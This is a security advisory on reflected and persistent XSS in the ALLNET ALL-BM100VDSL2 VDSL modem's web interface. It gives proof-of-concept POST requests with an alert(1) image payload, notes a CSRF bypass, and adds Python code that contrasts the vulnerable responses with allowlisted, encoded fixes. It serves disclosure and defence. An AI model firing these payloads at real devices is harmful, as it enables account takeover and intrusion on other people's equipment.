VDSL Client Modem ALL-BM100VDSL2: XSS
Date: 2017-04-13 14:13:12

1. Introduction
Affected Product: VDSL Client Modem ALL-BM100VDSL2 C.4.6a
Fixed in: C.4.8a
Fixed Version Link: http://www.allnet.de/nc/de/allnet-brand/support/treiber-firmware/download/120183/
Vendor Website: http://www.allnet.de/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 12/20/2016
Disclosed to public: 04/13/2017
Release mode: Coordinated Release
CVE: n/a (not requested)
Credits: Tim Coen & Marcus Gruber of Curesec GmbH
2. Overview
The web interface of the VDSL Client Modem ALL-BM100VDSL2 is vulnerable to reflected as well as persistent XSS. A privileged user account is required to exploit the persistent XSS vulnerability but this can be bypassed via CSRF.
3. Details
Reflected XSS
CVSS: Medium 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Description: Each request to the web application that performs a state-changing action receives a generic redirect response as its reply. The target of the redirect is taken from the "page" parameter submitted by the user. Because this value is echoed both into an HTML attribute and into a JavaScript string without proper encoding, the response is vulnerable to reflected XSS.
Proof of Concept:
Request:

POST /goform/ifx_set_system_password HTTP/1.1
Host: 192.168.0.100

page=system_password.html'"><img src=no onerror=alert(1)>&curr_user_id=1&submitflag=1&users=%3CNew+User%3E&userEnable=1&userNew=test3&user_passwd_edit_enable=1&userNewPswd=test&userConPswd=test&userLaccess=1&userRaccess=1&userFTPaccess=1&userSMBaccess=1

Response:

<html><head>
<script type="text/javascript">
location.href="/system_password.html'"><img src=no onerror=alert(1)>";
</script>
</head><body>
This document has moved to a new <a href="system_password.html'"><img src=no onerror=alert(1)>">location</a>.
Please update your documents to reflect the new location.
</body></html>
Persistent XSS
CVSS: Medium 4.3 CVSS:3.0/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
At least one field (HostName) is vulnerable to persistent XSS; other values may be affected as well. A privileged user is required to place the payload, but an attacker can also use CSRF to place it.
Proof of Concept:
POST /goform/ifx_set_wizard_host HTTP/1.1
Host: 192.168.16.254

page=system_hostname.asp&HostName=dslcpe'"><img src=no onerror=alert(1)>&DomainName=vdsl.com

Visiting http://192.168.16.254/system_hostname.asp triggers the payload.
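The following Python is an added example written for this write-up; it is not code from the Curesec advisory or from the ALLNET firmware. It rebuilds the two response patterns described in the reflected and persistent sections above (the redirect page that echoes the "page" parameter into a JavaScript string and an HTML href attribute, and the hostname page that echoes the stored HostName value) and places a hardened version beside each: an allowlist of redirect targets plus context-specific encoding (JSON for the JavaScript string, HTML attribute escaping for the href and the input value). The allowlist contents, the default page name and the `<input>` markup of the hostname page are assumptions made for the example.

```python
import html
import json
import re

# Assumed allowlist of pages the redirect may legitimately target. The real
# firmware would hold its own list; these two names come from the advisory.
ALLOWED_PAGES = {"system_password.html", "system_hostname.asp"}
DEFAULT_PAGE = "index.html"  # assumed fallback target

# A page name is a bare file name, no slashes, quotes or angle brackets.
_PAGE_NAME_RE = re.compile(r"^[A-Za-z0-9_]+\.(html|asp)$")

# The advisory's payload, reused here as the sample input.
PAYLOAD = "system_password.html'\"><img src=no onerror=alert(1)>"
HOSTNAME_PAYLOAD = "dslcpe'\"><img src=no onerror=alert(1)>"


def redirect_page_vulnerable(page):
    """Mirrors the advisory's redirect response: 'page' is concatenated raw
    into both a JavaScript string literal and an HTML href attribute."""
    return (
        '<html><head><script type="text/javascript">'
        'location.href="/%s";</script></head><body>'
        'This document has moved to a new <a href="%s">location</a>.'
        "</body></html>" % (page, page)
    )


def safe_redirect_target(page):
    """Allowlist check: only a syntactically plain, known page name is used as
    the redirect target; anything else falls back to DEFAULT_PAGE."""
    if page and _PAGE_NAME_RE.match(page) and page in ALLOWED_PAGES:
        return page
    return DEFAULT_PAGE


def redirect_page_hardened(page):
    """Same response shape, but the target is allowlisted first and then
    encoded for each output context it lands in."""
    target = safe_redirect_target(page)
    js_literal = json.dumps("/" + target)          # JavaScript string context
    attr_value = html.escape(target, quote=True)   # HTML attribute context
    return (
        '<html><head><script type="text/javascript">'
        "location.href=%s;</script></head><body>"
        'This document has moved to a new <a href="%s">location</a>.'
        "</body></html>" % (js_literal, attr_value)
    )


def hostname_page_vulnerable(hostname):
    """Assumed shape of the system_hostname.asp form field: the stored
    HostName is written into a value attribute without encoding."""
    return '<input name="HostName" value="%s">' % hostname


def hostname_page_hardened(hostname):
    """Stored value is HTML-attribute-encoded at render time; quote=True also
    encodes ' and " so the attribute cannot be closed early."""
    return '<input name="HostName" value="%s">' % html.escape(hostname, quote=True)


def contains_unencoded_payload(body, marker="<img src=no onerror="):
    """Response check a tester or a regression test can run: does the injected
    markup survive unencoded in the generated page?"""
    return marker in body


if __name__ == "__main__":
    for name, body in [
        ("redirect (vulnerable)", redirect_page_vulnerable(PAYLOAD)),
        ("redirect (hardened)", redirect_page_hardened(PAYLOAD)),
        ("hostname (vulnerable)", hostname_page_vulnerable(HOSTNAME_PAYLOAD)),
        ("hostname (hardened)", hostname_page_hardened(HOSTNAME_PAYLOAD)),
    ]:
        print("%-22s payload present: %s" % (name, contains_unencoded_payload(body)))
```

The allowlist is the primary control for the redirect, not the encoding: a string placed inside a `<script>` block ends the block as soon as it contains `</script>`, and `json.dumps` does not escape `<` or `/`, so encoding alone would still leave a gap if arbitrary page names were accepted. For the stored HostName, attribute encoding at render time is what closes the hole, and it must be applied on every page that echoes the value, not just the one the advisory names.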
4. Solution
To mitigate this issue, upgrade to version C.4.8a or later:
http://www.allnet.de/nc/de/allnet-brand/support/treiber-firmware/download/120183/
Please note that a newer version might already be available.
5. Report Timeline
12/20/2016 | Informed Vendor about Issue
12/23/2016 | Vendor announces release of new firmware
02/15/2017 | Reminded Vendor about disclosure date
03/01/2017 | Vendor releases new Version
04/13/2017 | Disclosed to public